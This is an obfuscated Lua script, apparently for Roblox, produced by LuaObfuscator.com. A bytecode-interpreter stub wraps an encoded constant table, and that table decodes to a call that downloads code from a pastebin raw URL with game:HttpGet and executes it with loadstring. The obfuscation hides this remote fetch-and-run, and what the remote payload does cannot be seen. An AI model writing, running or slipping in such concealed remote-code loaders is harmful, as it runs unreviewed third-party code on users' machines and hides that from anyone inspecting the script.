--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v86=v5(v81,v19);v19=nil;return v86;else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/((5 -(1 + 2))^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-(1 + 0))) + (2 -(878 -(282 + 595))))) ;return v82-(v82%(620 -(555 + 64))) ;else local v83=2^(v32-(932 -(857 + (1711 -(1523 + 114))))) ;return (((v31%(v83 + v83))>=v83) and (569 -(367 + 201))) or (927 -(214 + 713)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 + 0 ;local v36;local v37;while true do if (v35==(1 -0)) then return (v37 * (1321 -(68 + 997))) + v36 ;end if (v35==0) then v36,v37=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;v35=118 -(32 + 84 + 1) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + 1 + 3 ;return (v41 * (16778173 -(892 + 65))) + (v40 * 65536) + (v39 * (469 -213)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=351 -(87 + 263) ;local v45=(v20(v43,181 -(67 + 113) ,15 + 5 ) * ((4 -2)^(24 + 8))) + v42 ;local v46=v20(v43,83 -62 ,983 -(802 + 150) );local v47=((v20(v43,(85 + 0) -53 )==1) and  -(1 -0)) or 1 ;if (v46==(791 -(368 + 423))) then if (v45==(0 -0)) then return v47 * ((18 -(10 + 8)) + 0) ;else local v87=997 -((3519 -2604) + 82) ;while true do if (v87==(0 -0)) then v46=1 + 0 ;v44=0 -0 ;break;end end end elseif (v46==2047) then return ((v45==(1187 -(1069 + 118))) and (v47 * (((444 -(416 + 26)) -1)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(178 + 845) ) * (v44 + (v45/((3 -1)^52))) ;end local function v25(v48) local v49=772 -(201 + 202 + 369) ;local v50;local v51;while true do if (v49==(1141 -(116 + 1022))) then return v6(v51);end if (v49==(0 -(885 -(261 + 624)))) then v50=nil;if  not v48 then local v94=0 + 0 ;while true do if (v94==((0 -0) -0)) then v48=v23();if (v48==0) then return "";end break;end end end v49=(1081 -(1020 + 60)) + 0 ;end if (v49==(7 -5)) then v51={};for v88=439 -(145 + 293) , #v50 do v51[v88]=v2(v1(v3(v50,v88,v88)));end v49=433 -(44 + 386) ;end if (v49==(1487 -(998 + 488))) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=2 + 0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0 -0 ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v66=(function() return 0;end)();while true do if (v66==(120 -(30 + 90))) then if (v52==(1636 -(1373 + 263))) then local v97=(function() return 1000 -(451 + 549) ;end)();while true do if (v97==(1 + 1)) then v52=(function() return 1;end)();break;end if (v97==(1 + 0)) then v55=(function() return {};end)();v56=(function() return {};end)();v97=(function() return 2 -0 ;end)();end if (v97~=0) then else v53=(function() return function(v112,v113,v114) local v115=(function() return 0 + 0 ;end)();while true do if ((0 + 0)==v115) then local v143=(function() return 0 + 0 ;end)();while true do if ((0 + 0)~=v143) then else v112[v113-#"~" ]=(function() return v114();end)();return v112,v113,v114;end end end end end;end)();v54=(function() return {};end)();v97=(function() return 1 -0 ;end)();end end end if (v52~=(1 -0)) then else local v98=(function() return 0 -0 ;end)();while true do if (v98~=(342 -(218 + 123))) then else v59=(function() return {};end)();for v107= #"{",v58 do local v108=(function() return 0;end)();local v109=(function() return;end)();local v110=(function() return;end)();local v111=(function() return;end)();while true do if (v108==(1581 -(1535 + 46))) then local v142=(function() return 0 + 0 ;end)();while true do if (1==v142) then v108=(function() return 1 + 0 ;end)();break;end if (0==v142) then v109=(function() return 0 + 0 ;end)();v110=(function() return nil;end)();v142=(function() return 1 + 0 ;end)();end end end if ((1 + 0)~=v108) then else v111=(function() return nil;end)();while true do if (v109==(396 -(115 + 281))) then local v175=(function() return 0 -0 ;end)();while true do if ((1 + 0)~=v175) then else v109=(function() return 2 -1 ;end)();break;end if ((0 -0)~=v175) then else v110=(function() return v21();end)();v111=(function() return nil;end)();v175=(function() return 868 -(550 + 317) ;end)();end end end if (v109==(1 + 0)) then if (v110== #"<") then v111=(function() return v21()~=(0 -0) ;end)();elseif (v110==(605 -(268 + 335))) then v111=(function() return v24();end)();elseif (v110== #"xnx") then v111=(function() return v25();end)();end v59[v107]=(function() return v111;end)();break;end end break;end end end v98=(function() return 2 -0 ;end)();end if (v98==(574 -(426 + 146))) then v52=(function() return 2 -0 ;end)();break;end if (v98~=0) then else v57=(function() return {v54,v55,nil,v56};end)();v58=(function() return v23();end)();v98=(function() return 286 -(134 + 151) ;end)();end end end v66=(function() return 2 -1 ;end)();end if (v66==1) then if (v52~=(1667 -(970 + 695))) then else v57[ #"-19"]=(function() return v21();end)();for v100= #"}",v23() do local v101=(function() return v21();end)();if (v20(v101, #"{", #"}")~=0) then else local v103=(function() return 0;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();while true do if (v103~=(5 -2)) then else if (v20(v105, #"xnx", #"xxx")~= #"]") then else v106[ #"0313"]=(function() return v59[v106[ #"http"]];end)();end v54[v100]=(function() return v106;end)();break;end if (v103==(1252 -(721 + 530))) then v106=(function() return {v22(),v22(),nil,nil};end)();if (v104==0) then local v145=(function() return 0 -0 ;end)();local v146=(function() return;end)();while true do if (v145~=0) then else v146=(function() return 1990 -(582 + 1408) ;end)();while true do if (v146==(0 -0)) then v106[ #"xnx"]=(function() return v22();end)();v106[ #"http"]=(function() return v22();end)();break;end end break;end end elseif (v104== #"}") then v106[ #"xxx"]=(function() return v23();end)();elseif (v104==2) then v106[ #"gha"]=(function() return v23() -((702 -(271 + 429))^16) ;end)();elseif (v104== #"-19") then local v182=(function() return 0 + 0 ;end)();local v183=(function() return;end)();while true do if (v182==(1500 -(1408 + 92))) then v183=(function() return 0 -0 ;end)();while true do if (v183==0) then v106[ #"-19"]=(function() return v23() -((7 -5)^(1 + 15)) ;end)();v106[ #".com"]=(function() return v22();end)();break;end end break;end end end v103=(function() return 1173 -(418 + 753) ;end)();end if (v103==2) then if (v20(v105, #" ", #"|")== #",") then v106[2]=(function() return v59[v106[1 + 1 ]];end)();end if (v20(v105,2,1826 -(1195 + 629) )== #"\\") then v106[ #"-19"]=(function() return v59[v106[ #"91("]];end)();end v103=(function() return 3;end)();end if (v103==(0 -0)) then local v138=(function() return 241 -(187 + 54) ;end)();local v139=(function() return;end)();while true do if (v138==(780 -(162 + 618))) then v139=(function() return 0 + 0 ;end)();while true do if (v139==(1 + 0)) then v103=(function() return 1;end)();break;end if (v139~=(0 -0)) then else v104=(function() return v20(v101,2 -0 , #"xxx");end)();v105=(function() return v20(v101, #"xnxx",6);end)();v139=(function() return 1 + 0 ;end)();end end break;end end end end end end for v102= #"[",v23() do v55,v102,v28=(function() return v53(v55,v102,v28);end)();end return v57;end break;end end end end local function v29(v60,v61,v62) local v63=v60[1323 -((2578 -(797 + 532)) + 73) ];local v64=v60[1 + 1 ];local v65=v60[1148 -(466 + 679) ];return function(...) local v67=v63;local v68=v64;local v69=v65;local v70=v27;local v71=1;local v72= -(2 -1);local v73={};local v74={...};local v75=v12("#",...) -(1901 -(106 + 1794)) ;local v76={};local v77={};for v84=0,v75 do if ((4055==4055) and (v84>=v69)) then v73[v84-v69 ]=v74[v84 + 1 ];else v77[v84]=v74[v84 + 1 + 0 + 0 ];end end local v78=(v75-v69) + 1 + 0 + 0 ;local v79;local v80;while true do local v85=0 -(0 -0) ;while true do if ((4149<=4445) and (v85==(0 -0))) then v79=v67[v71];v80=v79[(1317 -(373 + 829)) -(4 + 110) ];v85=585 -(57 + 527) ;end if ((v85==((2159 -(476 + 255)) -(41 + (2516 -(369 + 761))))) or (1818==85)) then if (v80<=((62 + 44) -(17 + 86))) then if (v80<=1) then if (v80==(0 + 0)) then v77[v79[(5 -2) -1 ]]=v62[v79[(14 -6) -5 ]];else local v118=v79[(406 -(64 + 174)) -(122 + 44) ];local v119,v120=v70(v77[v118](v13(v77,v118 + (1 -0) ,v79[(2 + 7) -6 ])));v72=(v120 + v118) -((1 -0) + 0) ;local v121=0 + (336 -(144 + 192)) ;for v140=v118,v72 do local v141=0 -0 ;while true do if ((630<2127) and (v141==(65 -(30 + 35)))) then v121=v121 + 1 + (216 -(42 + 174)) ;v77[v140]=v119[v121];break;end end end end elseif (v80>(1259 -(1043 + 214))) then v77[v79[7 -5 ]]=v79[1215 -(323 + 889) ];else local v124=v79[5 -3 ];local v125=v77[v79[583 -(361 + 219) ]];v77[v124 + 1 ]=v125;v77[v124]=v125[v79[324 -(53 + 201 + 66) ]];end elseif (v80<=(2 + 3)) then if (v80>((346 + 71) -(15 + 398))) then do return;end else v77[v79[2]]();end elseif (v80>(988 -(18 + 964))) then local v129=(0 + 0) -0 ;local v130;local v131;local v132;local v133;local v134;while true do if ((0 + 0)==v129) then v130=nil;v131,v132=nil;v133=nil;v134=nil;v129=1;end if ((v129==(2 + 0)) or (1938==2514)) then v71=v71 + (851 -(20 + 830)) ;v79=v67[v71];v134=v79[2 + 0 ];v133=v77[v79[129 -((1620 -(363 + 1141)) + 10) ]];v129=1 + 2 ;end if ((742 -(542 + 196))==v129) then v77[v79[(1583 -(1183 + 397)) -1 ]]=v79[(2 -1) + 2 ];v71=v71 + 1 ;v79=v67[v71];v134=v79[2 + 0 ];v129=2 + 3 ;end if ((4255>=55) and (v129==3)) then v77[v134 + (2 -1) ]=v133;v77[v134]=v133[v79[9 -(4 + 1) ]];v71=v71 + (1552 -(1126 + 318 + 107)) ;v79=v67[v71];v129=409 -(118 + 287) ;end if ((2999>1156) and (v129==(3 -2))) then v77[v79[1123 -(118 + 1003) ]]=v62[v79[8 -5 ]];v71=v71 + 1 ;v79=v67[v71];v77[v79[379 -(142 + 235) ]]=v62[v79[13 -10 ]];v129=1 + 1 ;end if ((983 -(553 + 424))==v129) then v71=v71 + (1 -(1975 -(1913 + 62))) ;v79=v67[v71];v134=v79[2 + 0 + 0 ];v77[v134]=v77[v134](v13(v77,v134 + 1 + 0 ,v72));v129=5 + 2 ;end if (v129==(3 + 4)) then v71=v71 + (2 -1) + 0 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v129=17 -9 ;end if ((2350>1155) and (v129==5)) then v131,v132=v70(v77[v134](v13(v77,v134 + 1 ,v79[7 -4 ])));v72=(v132 + v134) -(2 -1) ;v130=0;for v172=v134,v72 do v130=v130 + 1 ;v77[v172]=v131[v130];end v129=2 + 4 ;end if (v129==8) then v79=v67[v71];do return;end break;end end else local v135=v79[9 -7 ];v77[v135]=v77[v135](v13(v77,v135 + (754 -(239 + 514)) ,v72));end v71=v71 + 1 + 0 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F57356E4D7737503600083Q0012073Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
